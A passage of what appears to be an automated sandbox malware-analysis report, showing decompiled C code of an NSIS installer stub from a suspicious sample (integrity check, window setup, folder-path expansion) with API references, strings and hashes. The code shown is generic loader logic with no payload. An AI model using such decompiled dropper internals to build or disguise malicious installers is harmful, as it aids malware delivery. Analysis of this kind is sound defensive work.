						 *0x7a1f00 = CreateWindowExW(0x80, 0x40a380, 0, 0x80000000, _v16, _v12, _v8 - _v16, _v4 - _v12, 0, 0,  *0x7a8a20, 0);
						goto L21;
					}
				} else {
					_t78 =  *(_t82 + 0x48);
					_t92 = _t78;
					if(_t78 == 0) {
						goto L16;
					}
					_t76 = 0x7a69c0;
					E0040612D(_t78, _t92,  *((intOrPtr*)(_t82 + 0x44)),  *0x7a8a78 + _t78 * 2,  *0x7a8a78 +  *(_t82 + 0x4c) * 2, 0x7a69c0, 0);
					_t63 =  *0x7a69c0; // 0x43
					if(_t63 == 0) {
						goto L16;
					}
					if(_t63 == 0x22) {
						_t76 = 0x7a69c2;
						 *((short*)(E00405B5D(0x7a69c2, 0x22))) = 0;
					}
					_t65 = _t76 + lstrlenW(_t76) * 2 - 8;
					if(_t65 <= _t76 || lstrcmpiW(_t65, L".exe") != 0) {
						L15:
						E0040625F(_t86, E00405B30(_t76));
						goto L16;
					} else {
						_t69 = GetFileAttributesW(_t76);
						if(_t69 == 0xffffffff) {
							L14:
							E00405B7C(_t76);
							goto L15;
						}
						_t98 = _t69 & 0x00000010;
						if((_t69 & 0x00000010) != 0) {
							goto L15;
						}
						goto L14;
					}
				}
			}

0x00403973
0x0040397c
0x00403983
0x00403985
0x00403999
0x004039ab
0x004039b4
0x004039bd
0x004039c4
0x004039c9
0x004039d0
0x004039e3
0x004039e3
0x004039ee
0x00403987
0x00403992
0x00403992
0x004039f3
0x004039fd
0x00403a06
0x00403a0b
0x00403a1c
0x00403aae
0x00403ab6
0x00403abf
0x00403abf
0x00403ad5
0x00403adb
0x00403ae9
0x00403b6a
0x00403b72
0x00403b7c
0x00403b81
0x00403b87
0x00403c11
0x00403c16
0x00403c18
0x00403c34
0x00000000
0x00403c34
0x00403c1a
0x00403c20
0x00403c28
0x00403c28
0x00000000
0x00403c20
0x00403b95
0x00403ba0
0x00403ba5
0x00403ba7
0x00403bae
0x00403bae
0x00403bb9
0x00403bc1
0x00403bc3
0x00403bc5
0x00403bce
0x00403bd1
0x00403bd7
0x00403bd7
0x00403bf6
0x00403c07
0x00000000
0x00403c0c
0x00403b74
0x00403b76
0x00000000
0x00403aeb
0x00403aeb
0x00403af7
0x00403b01
0x00403b07
0x00403b0c
0x00403b1b
0x00403c39
0x00403c39
0x00000000
0x00403c39
0x00403b2a
0x00403b65
0x00000000
0x00403b65
0x00403a22
0x00403a22
0x00403a25
0x00403a27
0x00000000
0x00000000
0x00403a35
0x00403a47
0x00403a4c
0x00403a55
0x00000000
0x00000000
0x00403a5b
0x00403a5d
0x00403a6a
0x00403a6a
0x00403a73
0x00403a79
0x00403aa1
0x00403aa9
0x00000000
0x00403a8b
0x00403a8c
0x00403a95
0x00403a9b
0x00403a9c
0x00000000
0x00403a9c
0x00403a97
0x00403a99
0x00000000
0x00000000
0x00000000
0x00403a99
0x00403a79

APIs

Part of subcall function 00406639: GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
Part of subcall function 00406639: GetProcAddress.KERNEL32(00000000,?), ref: 00406666

lstrcatW.KERNEL32(1033,007A1F20), ref: 004039EE
lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403A6E
lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra,1033,007A1F20,80000001,Control Panel\Desktop\ResourceLocale,00000000,007A1F20,00000000), ref: 00403A81
GetFileAttributesW.KERNEL32(Call), ref: 00403A8C
LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra), ref: 00403AD5

Part of subcall function 004061A6: wsprintfW.USER32 ref: 004061B3

RegisterClassW.USER32(007A79C0), ref: 00403B12
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B2A
CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B5F
ShowWindow.USER32(00000005,00000000), ref: 00403B95
GetClassInfoW.USER32(00000000,RichEdit20W,007A79C0), ref: 00403BC1
GetClassInfoW.USER32(00000000,RichEdit,007A79C0), ref: 00403BCE
RegisterClassW.USER32(007A79C0), ref: 00403BD7
DialogBoxParamW.USER32(?,00000000,00403D1B,00000000), ref: 00403BF6

Strings

.exe, xrefs: 00403A7B
C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra, xrefs: 004039FD, 00403A05, 00403AA8, 00403AAE, 00403ABE
RichEd32, xrefs: 00403BA9
RichEdit, xrefs: 00403BC8
_Nb, xrefs: 00403AF1, 00403B59
"C:\Users\user\Desktop\hi38VYWujz.exe", xrefs: 00403971
C:\Users\user\AppData\Local\Temp\, xrefs: 00403979
RichEdit20W, xrefs: 00403BB9, 00403BBF
Control Panel\Desktop\ResourceLocale, xrefs: 004039A1
Call, xrefs: 00403A35, 00403A3E, 00403A4C, 00403A9B, 00403AA1
RichEd20, xrefs: 00403B9B
.DEFAULT\Control Panel\International, xrefs: 004039D9
1033, xrefs: 0040398D, 004039E9

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
String ID: "C:\Users\user\Desktop\hi38VYWujz.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Cascara\Personers\Narra$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
API String ID: 1975747703-232589096
Opcode ID: 534ff8e0cd0ad6c04b10acd2ef2da6e93543f5cd5b29ee7ce0b8abe9c54844f8
Instruction ID: 0f1e86156467dc572bfe90fa2eb59b903a3bd9170c228be251d5c9c569d222eb
Opcode Fuzzy Hash: 534ff8e0cd0ad6c04b10acd2ef2da6e93543f5cd5b29ee7ce0b8abe9c54844f8
Instruction Fuzzy Hash: 9861C371200604AED720AF669D45F2B3A6CEBC5B49F00853FF941B62E2DB7C69118A2D

Uniqueness

Uniqueness Score: -1.00%

Function 00402EC1 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00402EC1(void* __eflags, signed int _a4) {
				DWORD* _v8;
				DWORD* _v12;
				void* _v16;
				intOrPtr _v20;
				long _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				signed int _v44;
				long _t43;
				signed int _t50;
				void* _t53;
				void* _t57;
				intOrPtr* _t59;
				long _t60;
				signed int _t65;
				signed int _t70;
				signed int _t71;
				signed int _t77;
				intOrPtr _t80;
				long _t82;
				signed int _t85;
				signed int _t87;
				void* _t89;
				signed int _t90;
				signed int _t93;
				void* _t94;

				_t82 = 0;
				_v12 = 0;
				_v8 = 0;
				_t43 = GetTickCount();
				_t91 = L"C:\\Users\\Arthur\\Desktop\\hi38VYWujz.exe";
				 *0x7a8a30 = _t43 + 0x3e8;
				GetModuleFileNameW(0, L"C:\\Users\\Arthur\\Desktop\\hi38VYWujz.exe", 0x400);
				_t89 = E00405D51(_t91, 0x80000000, 3);
				_v16 = _t89;
				 *0x40a018 = _t89;
				if(_t89 == 0xffffffff) {
					return L"Error launching installer";
				}
				_t92 = L"C:\\Users\\Arthur\\Desktop";
				E0040625F(L"C:\\Users\\Arthur\\Desktop", _t91);
				E0040625F(0x7b7000, E00405B7C(_t92));
				_t50 = GetFileSize(_t89, 0);
				__eflags = _t50;
				 *0x7976dc = _t50;
				_t93 = _t50;
				if(_t50 <= 0) {
					L24:
					E00402E5D("true");
					__eflags =  *0x7a8a38 - _t82;
					if( *0x7a8a38 == _t82) {
						goto L29;
					}
					__eflags = _v8 - _t82;
					if(_v8 == _t82) {
						L28:
						_t53 = GlobalAlloc(0x40, _v24); // executed
						_t94 = _t53;
						E00403308( *0x7a8a38 + 0x1c);
						_push(_v24);
						_push(_t94);
						_push(_t82);
						_push(0xffffffff); // executed
						_t57 = E004030FA(); // executed
						__eflags = _t57 - _v24;
						if(_t57 == _v24) {
							__eflags = _v44 & 0x00000001;
							 *0x7a8a34 = _t94;
							 *0x7a8a3c =  *_t94;
							if((_v44 & 0x00000001) != 0) {
								 *0x7a8a40 =  *0x7a8a40 + 1;
								__eflags =  *0x7a8a40;
							}
							_t40 = _t94 + 0x44; // 0x44
							_t59 = _t40;
							_t85 = 8;
							do {
								_t59 = _t59 - 8;
								 *_t59 =  *_t59 + _t94;
								_t85 = _t85 - 1;
								__eflags = _t85;
							} while (_t85 != 0);
							_t60 = SetFilePointer(_v16, _t82, _t82, "true"); // executed
							 *(_t94 + 0x3c) = _t60;
							E00405D0C(0x7a8a60, _t94 + 4, 0x40);
							__eflags = 0;
							return 0;
						}
						goto L29;
					}
					E00403308( *0x78b6d4);
					_t65 = E004032F2( &_a4, 4);
					__eflags = _t65;
					if(_t65 == 0) {
						goto L29;
					}
					__eflags = _v12 - _a4;
					if(_v12 != _a4) {
						goto L29;
					}
					goto L28;
				} else {
					do {
						_t90 = _t93;
						asm("sbb eax, eax");
						_t70 = ( ~( *0x7a8a38) & 0x00007e00) + 0x200;
						__eflags = _t93 - _t70;
						if(_t93 >= _t70) {
							_t90 = _t70;
						}
						_t71 = E004032F2(0x7976e0, _t90);
						__eflags = _t71;
						if(_t71 == 0) {
							E00402E5D("true");
							L29:
							return L"Installer integrity check has failed. Common causes include\nincomplete download and damaged media. Contact the\ninstaller\'s author to obtain a new copy.\n\nMore information at:\nhttp://nsis.sf.net/NSIS_Error";
						}
						__eflags =  *0x7a8a38;
						if( *0x7a8a38 != 0) {
							__eflags = _a4 & 0x00000002;
							if((_a4 & 0x00000002) == 0) {
								E00402E5D(0);
							}
							goto L20;
						}
						E00405D0C( &_v44, 0x7976e0, 0x1c);
						_t77 = _v44;
						__eflags = _t77 & 0xfffffff0;
						if((_t77 & 0xfffffff0) != 0) {
							goto L20;
						}
						__eflags = _v40 - 0xdeadbeef;
						if(_v40 != 0xdeadbeef) {
							goto L20;
						}
						__eflags = _v28 - 0x74736e49;
						if(_v28 != 0x74736e49) {
							goto L20;
						}
						__eflags = _v32 - 0x74666f73;
						if(_v32 != 0x74666f73) {
							goto L20;
						}
						__eflags = _v36 - 0x6c6c754e;
						if(_v36 != 0x6c6c754e) {
							goto L20;
						}
						_a4 = _a4 | _t77;
						_t87 =  *0x78b6d4; // 0x89ba5
						 *0x7a8ae0 =  *0x7a8ae0 | _a4 & 0x00000002;
						_t80 = _v20;
						__eflags = _t80 - _t93;
						 *0x7a8a38 = _t87;
						if(_t80 > _t93) {
							goto L29;
						}
						__eflags = _a4 & 0x00000008;
						if((_a4 & 0x00000008) != 0) {
							L16:
							_v8 = _v8 + 1;
							_t24 = _t80 - 4; // 0x40a2dc
							_t93 = _t24;
							__eflags = _t90 - _t93;
							if(_t90 > _t93) {
								_t90 = _t93;
							}
							goto L20;
						}
						__eflags = _a4 & 0x00000004;
						if((_a4 & 0x00000004) != 0) {
							break;
						}
						goto L16;
						L20:
						__eflags = _t93 -  *0x7976dc; // 0x8b410
						if(__eflags < 0) {
							_v12 = E0040672C(_v12, 0x7976e0, _t90);
						}
						 *0x78b6d4 =  *0x78b6d4 + _t90;
						_t93 = _t93 - _t90;
						__eflags = _t93;
					} while (_t93 > 0);
					_t82 = 0;
					__eflags = 0;
					goto L24;
				}
			}

0x00402ec9
0x00402ecc
0x00402ecf
0x00402ed2
0x00402ed8
0x00402ee9
0x00402eee
0x00402f01
0x00402f06
0x00402f09
0x00402f0f
0x00000000
0x00402f11
0x00402f1c
0x00402f22
0x00402f33
0x00402f3a
0x00402f40
0x00402f42
0x00402f47
0x00402f49
0x00403036
0x00403038
0x0040303d
0x00403044
0x00000000
0x00000000
0x00403046
0x00403049
0x0040306d
0x00403072
0x00403078
0x00403083
0x00403088
0x0040308b
0x0040308c
0x0040308d
0x0040308f
0x00403094
0x00403097
0x004030aa
0x004030ae
0x004030b6
0x004030bb
0x004030bd
0x004030bd
0x004030bd
0x004030c5
0x004030c5
0x004030c8
0x004030c9
0x004030c9
0x004030cc
0x004030ce
0x004030ce
0x004030ce
0x004030d8
0x004030de
0x004030ec
0x004030f1
0x00000000
0x004030f1
0x00000000
0x00403097
0x00403051
0x0040305c
0x00403061
0x00403063
0x00000000
0x00000000
0x00403068
0x0040306b
0x00000000
0x00000000
0x00000000
0x00402f4f
0x00402f54
0x00402f59
0x00402f5d
0x00402f64
0x00402f69
0x00402f6b
0x00402f6d
0x00402f6d
0x00402f71
0x00402f76
0x00402f78
0x004030a2
0x00403099
0x00000000
0x00403099
0x00402f7e
0x00402f85
0x00403001
0x00403005
0x00403009
0x0040300e
0x00000000
0x00403005
0x00402f8e
0x00402f93
0x00402f96
0x00402f9b
0x00000000
0x00000000
0x00402f9d
0x00402fa4
0x00000000
0x00000000
0x00402fa6
0x00402fad
0x00000000
0x00000000
0x00402faf
0x00402fb6
0x00000000
0x00000000
0x00402fb8
0x00402fbf
0x00000000
0x00000000
0x00402fc1
0x00402fc7
0x00402fd0
0x00402fd6
0x00402fd9
0x00402fdb
0x00402fe1
0x00000000
0x00000000
0x00402fe7
0x00402feb
0x00402ff3
0x00402ff3
0x00402ff6
0x00402ff6
0x00402ff9
0x00402ffb
0x00402ffd
0x00402ffd
0x00000000
0x00402ffb
0x00402fed
0x00402ff1
0x00000000
0x00000000
0x00000000
0x0040300f
0x0040300f
0x00403015
0x00403021
0x00403021
0x00403024
0x0040302a
0x0040302c
0x0040302c
0x00403034
0x00403034
0x00000000
0x00403034

APIs

GetTickCount.KERNEL32 ref: 00402ED2
GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\hi38VYWujz.exe,00000400,?,00000006,00000008,0000000A), ref: 00402EEE

Part of subcall function 00405D51: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\hi38VYWujz.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
Part of subcall function 00405D51: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77

GetFileSize.KERNEL32(00000000,00000000,007B7000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\hi38VYWujz.exe,C:\Users\user\Desktop\hi38VYWujz.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F3A

Strings

"C:\Users\user\Desktop\hi38VYWujz.exe", xrefs: 00402EC1
Null, xrefs: 00402FB8
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403099
C:\Users\user\AppData\Local\Temp\, xrefs: 00402ECB
C:\Users\user\Desktop\hi38VYWujz.exe, xrefs: 00402ED8, 00402EE7, 00402EFB, 00402F1B
vy, xrefs: 00402F4F
C:\Users\user\Desktop, xrefs: 00402F1C, 00402F21, 00402F27
soft, xrefs: 00402FAF
Inst, xrefs: 00402FA6
Error launching installer, xrefs: 00402F11

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007B3000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007D8000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45135016541.00000000007DA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_hi38VYWujz.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: "C:\Users\user\Desktop\hi38VYWujz.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\hi38VYWujz.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft$vy
API String ID: 4283519449-3459393387
Opcode ID: 5b59a3334938b1ada53fb21aa8cc17301929ac982103e349ce86a46566e051fd
Instruction ID: 5e1ca327f74bc56913369b9b8f7861415b50b435560b28898b8d4eae658a22e8
Opcode Fuzzy Hash: 5b59a3334938b1ada53fb21aa8cc17301929ac982103e349ce86a46566e051fd
Instruction Fuzzy Hash: BC51F171901209AFDB20AF65DD85B9E7EA8EB4035AF10803BF505B62D5CB7C8E418B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00406281 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 209
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 72%

			E00406281(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t43;
				WCHAR* _t44;
				signed char _t46;
				signed int _t47;
				signed int _t48;
				short _t58;
				short _t60;
				short _t62;
				void* _t70;
				signed int _t76;
				void* _t82;
				signed char _t83;
				short _t86;
				signed int _t96;
				void* _t102;
				short _t103;
				signed int _t106;
				signed int _t108;
				void* _t109;
				WCHAR* _t110;
				void* _t112;

				_t109 = __esi;
				_t102 = __edi;
				_t70 = __ebx;
				_t43 = _a8;
				if(_t43 < 0) {
					_t43 =  *( *0x7a79fc - 4 + _t43 * 4);
				}
				_push(_t70);
				_push(_t109);
				_push(_t102);
				_t96 =  *0x7a8a78 + _t43 * 2;
				_t44 = 0x7a69c0;
				_t110 = 0x7a69c0;
				if(_a4 >= 0x7a69c0 && _a4 - 0x7a69c0 >> 1 < 0x800) {
					_t110 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t103 =  *_t96;
					if(_t103 == 0) {
						break;
					}
					__eflags = (_t110 - _t44 & 0xfffffffe) - 0x800;
					if((_t110 - _t44 & 0xfffffffe) >= 0x800) {
						break;
					}
					_t82 = 2;
					_t96 = _t96 + _t82;
					__eflags = _t103 - 4;
					_a8 = _t96;
					if(__eflags >= 0) {
						if(__eflags != 0) {
							 *_t110 = _t103;
							_t110 = _t110 + _t82;
							__eflags = _t110;
						} else {
							 *_t110 =  *_t96;
							_t110 = _t110 + _t82;
							_t96 = _t96 + _t82;
						}
						continue;
					}
					_t83 =  *((intOrPtr*)(_t96 + 1));
					_t46 =  *_t96;
					_t47 = _t46 & 0x000000ff;
					_v8 = (_t83 & 0x0000007f) << 0x00000007 | _t46 & 0x0000007f;
					_a8 = _a8 + 2;
					_v28 = _t47 | 0x00008000;
					_v24 = _t47;
					_t76 = _t83 & 0x000000ff;
					_v16 = _t76;
					__eflags = _t103 - 2;
					_v20 = _t76 | 0x00008000;
					if(_t103 != 2) {
						__eflags = _t103 - 3;
						if(_t103 != 3) {
							__eflags = _t103 - 1;
							if(_t103 == 1) {
								__eflags = (_t47 | 0xffffffff) - _v8;
								E00406281(_t76, _t103, _t110, _t110, (_t47 | 0xffffffff) - _v8);
							}
							L43:
							_t48 = lstrlenW(_t110);
							_t96 = _a8;
							_t110 =  &(_t110[_t48]);
							_t44 = 0x7a69c0;
							continue;
						}
						_t106 = _v8;
						__eflags = _t106 - 0x1d;
						if(_t106 != 0x1d) {
							__eflags = (_t106 << 0xb) + 0x7a9000;
							E0040625F(_t110, (_t106 << 0xb) + 0x7a9000);
						} else {
							E004061A6(_t110,  *0x7a8a28);
						}
						__eflags = _t106 + 0xffffffeb - 7;
						if(_t106 + 0xffffffeb < 7) {
							L34:
							E004064F3(_t110);
						}
						goto L43;
					}
					_t86 =  *0x7a8a2c;
					__eflags = _t86;
					_t108 = 2;
					if(_t86 >= 0) {
						L13:
						_v8 = 1;
						L14:
						__eflags =  *0x7a8ac4;
						if( *0x7a8ac4 != 0) {
							_t108 = 4;
						}
						__eflags = _t47;
						if(__eflags >= 0) {
							__eflags = _t47 - 0x25;
							if(_t47 != 0x25) {
								__eflags = _t47 - 0x24;
								if(_t47 == 0x24) {
									GetWindowsDirectoryW(_t110, 0x400);
									_t108 = 0;
								}
								while(1) {
									__eflags = _t108;
									if(_t108 == 0) {
										goto L30;
									}
									_t58 =  *0x7a8a24;
									_t108 = _t108 - 1;
									__eflags = _t58;
									if(_t58 == 0) {
										L26:
										_t60 = SHGetSpecialFolderLocation( *0x7a8a28,  *(_t112 + _t108 * 4 - 0x18),  &_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											L28:
											 *_t110 =  *_t110 & 0x00000000;
											__eflags =  *_t110;
											continue;
										}
										__imp__SHGetPathFromIDListW(_v12, _t110);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t60;
										if(_t60 != 0) {
											goto L30;
										}
										goto L28;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L26;
									}
									_t62 =  *_t58( *0x7a8a28,  *(_t112 + _t108 * 4 - 0x18), 0, 0, _t110); // executed
									__eflags = _t62;
									if(_t62 == 0) {
										goto L30;
									}
									goto L26;
								}
								goto L30;
							}
							GetSystemDirectoryW(_t110, 0x400);
							goto L30;
						} else {
							E0040612D( *0x7a8a78, __eflags, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8a78 + (_t47 & 0x0000003f) * 2, _t110, _t47 & 0x00000040); // executed
							__eflags =  *_t110;
							if( *_t110 != 0) {
								L32:
								__eflags = _t76 - 0x1a;
								if(_t76 == 0x1a) {
									lstrcatW(_t110, L"\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L34;
							}
							E00406281(_t76, _t108, _t110, _t110, _t76);
							L30:
							__eflags =  *_t110;
							if( *_t110 == 0) {
								goto L34;
							}
							_t76 = _v16;
							goto L32;
						}
					}
					__eflags = _t86 - 0x5a04;
					if(_t86 == 0x5a04) {
						goto L13;
					}
					__eflags = _t76 - 0x23;
					if(_t76 == 0x23) {
						goto L13;
					}
					__eflags = _t76 - 0x2e;
					if(_t76 == 0x2e) {
						goto L13;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L14;
					}
				}
				 *_t110 =  *_t110 & 0x00000000;
				if(_a4 == 0) {
					return _t44;
				}
				return E0040625F(_a4, _t44);
			}

0x00406281
0x00406281
0x00406281
0x00406287
0x0040628c
0x0040629d
0x0040629d
0x004062a5
0x004062a6
0x004062a7
0x004062a8
0x004062ab
0x004062b3
0x004062b5
0x004062ce
0x004062d1
0x004062d1
0x004064cd
0x004064cd
0x004064d3
0x00000000
0x00000000
0x004062e1
0x004062e7
0x00000000
0x00000000
0x004062ef
0x004062f0
0x004062f2
0x004062f6
0x004062f9
0x004064ba
0x004064c8
0x004064cb
0x004064cb
0x004064bc
0x004064bf
0x004064c2
0x004064c4
0x004064c4
0x00000000
0x004064ba
0x004062ff
0x00406302
0x00406311
0x00406318
0x00406322
0x00406326
0x00406329
0x0040632c
0x00406331
0x00406336
0x0040633a
0x0040633d
0x0040645d
0x00406461
0x00406494
0x00406498
0x0040649d
0x004064a2
0x004064a2
0x004064a7
0x004064a8
0x004064ad
0x004064b0
0x004064b3
0x00000000
0x004064b3
0x00406463
0x00406466
0x00406469
0x0040647e
0x00406485
0x0040646b
0x00406472
0x00406472
0x0040648d
0x00406490
0x00406455
0x00406456
0x00406456
0x00000000
0x00406490
0x00406343
0x0040634b
0x0040634d
0x0040634e
0x00406367
0x00406367
0x0040636e
0x0040636e
0x00406375
0x00406379
0x00406379
0x0040637a
0x0040637c
0x004063b7
0x004063ba
0x004063ca
0x004063cd
0x004063d5
0x004063db
0x004063db
0x00406438
0x00406438
0x0040643a
0x00000000
0x00000000
0x004063df
0x004063e6
0x004063e7
0x004063e9
0x00406403
0x00406411
0x00406417
0x00406419
0x00406434
0x00406434
0x00406434
0x00000000
0x00406434
0x0040641f
0x0040642a
0x00406430
0x00406432
0x00000000
0x00000000
0x00000000
0x00406432
0x004063eb
0x004063ee
0x00000000
0x00000000
0x004063fd
0x004063ff
0x00406401
0x00000000
0x00000000
0x00000000
0x00406401
0x00000000
0x00406438
0x004063c2
0x00000000
0x0040637e
0x0040639c
0x004063a1
0x004063a5
0x00406445
0x00406445
0x00406448
0x00406450
0x00406450
0x00000000
0x00406448
0x004063ad
0x0040643c
0x0040643c
0x00406440
0x00000000
0x00000000
0x00406442
0x00000000
0x00406442
0x0040637c
0x00406350
0x00406355
0x00000000
0x00000000
0x00406357
0x0040635a
0x00000000
0x00000000
0x0040635c
0x0040635f
0x00000000
0x00406361
0x00406361
0x00000000
0x00406361
0x0040635f
0x004064d9
0x004064e4
0x004064f0
0x004064f0
0x00000000

APIs

GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 004063C2
GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 004063D5
SHGetSpecialFolderLocation.SHELL32(004052FA,007924D8,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 00406411
SHGetPathFromIDListW.SHELL32(007924D8,Call), ref: 0040641F
CoTaskMemFree.OLE32(007924D8), ref: 0040642A
lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406450
lstrlenW.KERNEL32(Call,00000000,007A0F00,?,004052FA,007A0F00,00000000), ref: 004064A8

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 0040644A
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406392
Call, xrefs: 004062AB, 00406386, 0040638D, 00406391, 004063AB, 004063AC, 004063C1, 004063D4, 004063F0, 0040641B, 0040644F, 00406455, 00406471, 00406484, 004064A1, 004064A7, 004064B3, 004064E6

Memory Dump Source

Source File: 00000006.00000002.45132331372.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.45132294401.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132406736.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.0000000000789000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000006.00000002.45132454040.00000000007AB000.00000004.00000001.01000000.00000004.sdmpDownload File
